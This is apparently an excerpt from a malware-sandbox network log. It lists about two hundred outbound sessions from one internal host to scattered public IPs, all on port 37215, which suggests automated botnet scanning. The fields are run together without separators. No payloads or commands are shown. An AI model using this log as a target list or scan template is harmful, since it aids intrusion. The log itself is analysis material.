                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9928192.168.2.1548210197.88.60.21437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9929192.168.2.155398641.210.216.2537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9930192.168.2.1544430157.106.130.15237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9931192.168.2.1558610142.231.133.17837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9932192.168.2.153966241.200.57.1937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9933192.168.2.1536872157.141.136.15637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9934192.168.2.1538664157.31.134.18337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9935192.168.2.1550636197.228.47.11337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9936192.168.2.1559866157.162.162.20937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9937192.168.2.154635241.170.104.21337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9938192.168.2.1557216197.179.215.11637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9939192.168.2.1542600157.187.179.15537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9940192.168.2.155888012.187.180.7937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9941192.168.2.1557658197.24.96.21137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9942192.168.2.1549408157.129.186.9137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9943192.168.2.1539488157.115.141.20337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9944192.168.2.1545734197.150.169.15037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9945192.168.2.154875869.125.212.6437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9946192.168.2.155676241.2.49.24737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9947192.168.2.1550578152.27.111.23237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9948192.168.2.1560166157.247.139.1537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9949192.168.2.1533752157.255.191.22237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9950192.168.2.1556354197.127.186.25537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9951192.168.2.1558594181.69.11.19637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9952192.168.2.153557441.66.125.23337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9953192.168.2.1534788197.194.225.10837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9954192.168.2.1558956197.206.223.5137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9955192.168.2.1555794125.53.243.237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9956192.168.2.153424243.5.64.24037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9957192.168.2.1556754197.192.156.20837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9958192.168.2.1545918157.27.45.12137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9959192.168.2.155760042.199.132.17237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9960192.168.2.1559672157.238.172.18837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9961192.168.2.1542598197.30.60.15437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9962192.168.2.1550052197.181.98.2137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9963192.168.2.155664441.29.121.17337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9964192.168.2.155735883.19.89.4937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9965192.168.2.1551324197.35.93.15337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9966192.168.2.1555554192.66.144.13737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9967192.168.2.154838841.121.207.1937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9968192.168.2.1556004157.7.78.9337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9969192.168.2.1542840157.152.239.10937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9970192.168.2.1533338197.236.19.9237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9971192.168.2.1550748197.84.239.6537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9972192.168.2.1556894197.86.52.14237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9973192.168.2.1555518197.35.243.11037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9974192.168.2.1546052157.72.34.21237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9975192.168.2.1550678197.172.251.24337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9976192.168.2.1560570157.205.194.1237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9977192.168.2.153694841.185.59.7237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9978192.168.2.1543410197.39.53.6337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9979192.168.2.1548388197.184.239.15337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9980192.168.2.155320841.36.184.23537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9981192.168.2.1558542197.149.142.16337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9982192.168.2.153687241.84.154.12937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9983192.168.2.1557206157.3.208.6037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9984192.168.2.1557354197.199.30.11137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9985192.168.2.155644873.178.173.9637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9986192.168.2.154617046.225.174.14237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9987192.168.2.1557512197.29.82.15837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9988192.168.2.1542276157.154.45.11537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9989192.168.2.155297041.62.231.10937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9990192.168.2.1534956197.161.228.20037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9991192.168.2.1547312157.19.39.20737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9992192.168.2.1557172197.132.111.7937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9993192.168.2.1560628135.75.96.9037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9994192.168.2.154898834.23.192.3837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9995192.168.2.1557756197.58.7.5937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9996192.168.2.1560130197.90.222.21837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9997192.168.2.1542894157.193.206.12137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9998192.168.2.1534044157.24.189.17437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9999192.168.2.1549180197.25.85.14237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10000192.168.2.153689041.1.248.11537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10001192.168.2.154957071.20.212.23237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10002192.168.2.155823241.223.160.2937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10003192.168.2.1557776157.6.155.7037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10004192.168.2.155879641.5.249.17737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10005192.168.2.1554438197.97.213.23737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10006192.168.2.153323841.85.24.20637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10007192.168.2.1532932197.143.115.7937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10008192.168.2.153486220.174.149.8637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10009192.168.2.1555290157.249.42.21737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10010192.168.2.156043841.245.148.7237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10011192.168.2.1542632197.204.25.22537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10012192.168.2.1542112197.253.201.8737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10013192.168.2.1539282157.251.108.9537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10014192.168.2.156047641.233.126.2937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10015192.168.2.1551444157.212.46.2637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10016192.168.2.155116661.128.125.20037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10017192.168.2.1551642197.61.66.21737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10018192.168.2.155989041.42.195.2837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10019192.168.2.1543560197.192.212.4737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10020192.168.2.1534602197.154.104.7937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10021192.168.2.154077077.251.210.11137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10022192.168.2.1532916157.114.237.25437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10023192.168.2.1545894154.46.245.237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10024192.168.2.1536756157.76.81.15337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10025192.168.2.153938041.200.88.20937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10026192.168.2.1536724175.216.76.11037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10027192.168.2.1559874157.226.98.22337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10028192.168.2.1552414110.185.250.19437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10029192.168.2.1553508197.33.166.9437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10030192.168.2.1541466131.31.252.11537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10031192.168.2.1559336184.231.124.7237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10032192.168.2.1538928180.16.71.20037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10033192.168.2.1557652197.137.134.18437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10034192.168.2.1533016197.78.139.5637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10035192.168.2.1546588171.103.107.12337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10036192.168.2.1541186157.207.83.20237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10037192.168.2.154583641.62.177.23837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10038192.168.2.1552958157.123.135.1537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10039192.168.2.154066041.208.235.14537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10040192.168.2.1551526197.145.178.8437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10041192.168.2.153976641.51.147.5937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10042192.168.2.1546394157.90.150.23237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10043192.168.2.1559624197.233.79.17937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10044192.168.2.1550776197.8.255.19437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10045192.168.2.1543586197.195.253.937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10046192.168.2.1534880143.103.204.14237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10047192.168.2.1537300157.31.215.21437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10048192.168.2.1558438157.1.221.25537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10049192.168.2.154163841.233.134.20437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10050192.168.2.153507841.196.225.12437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10051192.168.2.1555032197.243.78.20737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10052192.168.2.154456084.125.57.5937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10053192.168.2.153994873.52.188.137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10054192.168.2.1533960197.248.54.7937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10055192.168.2.153956241.238.53.18137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10056192.168.2.1540042157.241.163.12337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10057192.168.2.1556046197.41.34.8037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10058192.168.2.1542644197.77.146.24937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10059192.168.2.155417896.132.88.12837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10060192.168.2.1559040157.22.27.24037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10061192.168.2.1548592222.242.10.6537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10062192.168.2.1545668197.140.24.15937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10063192.168.2.1556612155.149.85.22637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10064192.168.2.154303289.207.245.1437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10065192.168.2.156064841.113.31.9637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10066192.168.2.155253842.157.60.23337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10067192.168.2.154315841.42.25.8437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10068192.168.2.153585641.7.236.13737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10069192.168.2.1541740157.194.107.8337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10070192.168.2.1548584197.176.155.21137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10071192.168.2.1546720197.200.28.12237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10072192.168.2.155625214.203.127.20637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10073192.168.2.1547246197.107.22.19837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10074192.168.2.155618241.83.243.2637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10075192.168.2.1552996157.194.166.14337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10076192.168.2.153914241.240.201.7337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10077192.168.2.1536282157.36.109.22637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10078192.168.2.153353841.177.188.737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10079192.168.2.154904841.107.190.9137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10080192.168.2.1557104197.254.55.24837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10081192.168.2.1545338157.182.88.4137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10082192.168.2.1557250119.235.88.10137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10083192.168.2.1557518157.57.57.8537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10084192.168.2.1556588197.23.103.14737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10085192.168.2.1554660157.92.149.15637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10086192.168.2.1546112157.249.87.15437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10087192.168.2.1543044197.193.131.23137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10088192.168.2.1557190197.203.235.10537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10089192.168.2.1540120157.29.236.10037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10090192.168.2.1541820197.102.120.23737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10091192.168.2.1558432104.157.149.13337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10092192.168.2.154147041.208.236.24337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10093192.168.2.1560876197.2.18.9437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10094192.168.2.156013041.37.192.7337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10095192.168.2.153930841.213.47.20437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10096192.168.2.155951841.123.120.10837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10097192.168.2.1550034193.151.91.20337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10098192.168.2.154449241.96.152.5837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10099192.168.2.1548430197.94.58.23337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10100192.168.2.1536850157.39.126.7137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10101192.168.2.1535380157.2.200.25237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10102192.168.2.1542400111.97.207.16837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10103192.168.2.1556210177.120.226.1937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10104192.168.2.1535996197.163.25.5737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10105192.168.2.1541936157.154.198.22737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10106192.168.2.1543152157.150.228.6937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10107192.168.2.156044441.228.173.1637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10108192.168.2.1541942197.255.27.21737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10109192.168.2.153832234.115.42.21437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10110192.168.2.1554226159.101.138.10137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10111192.168.2.1542632176.195.46.1737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10112192.168.2.1546120197.1.141.637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10113192.168.2.153327441.17.83.19837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10114192.168.2.1558580136.129.233.4637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10115192.168.2.1550944157.251.72.17337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10116192.168.2.1548818157.5.104.2637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10117192.168.2.1553504157.95.251.24437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10118192.168.2.153382214.6.155.25237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10119192.168.2.154641041.24.184.13437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10120192.168.2.154684241.128.77.10337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10121192.168.2.154336041.149.27.15237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10122192.168.2.1543716101.175.75.21437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10123192.168.2.1548446197.230.134.19337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10124192.168.2.1540814157.3.227.22837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10125192.168.2.154301241.224.88.7737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10126192.168.2.1536894197.81.170.24237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10127192.168.2.1537776132.121.10.19137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10128192.168.2.1554670175.30.72.16137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10129192.168.2.1535322157.37.190.12137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10130192.168.2.1536250199.154.96.2137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10131192.168.2.1547600197.192.206.16537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10132192.168.2.155467080.70.180.1837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10133192.168.2.1544932157.174.126.14337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10134192.168.2.1538386157.89.120.24537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10135192.168.2.155178841.152.240.22137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10136192.168.2.15491825.75.200.10537215
                                                          TimestampBytes transferredDirectionData


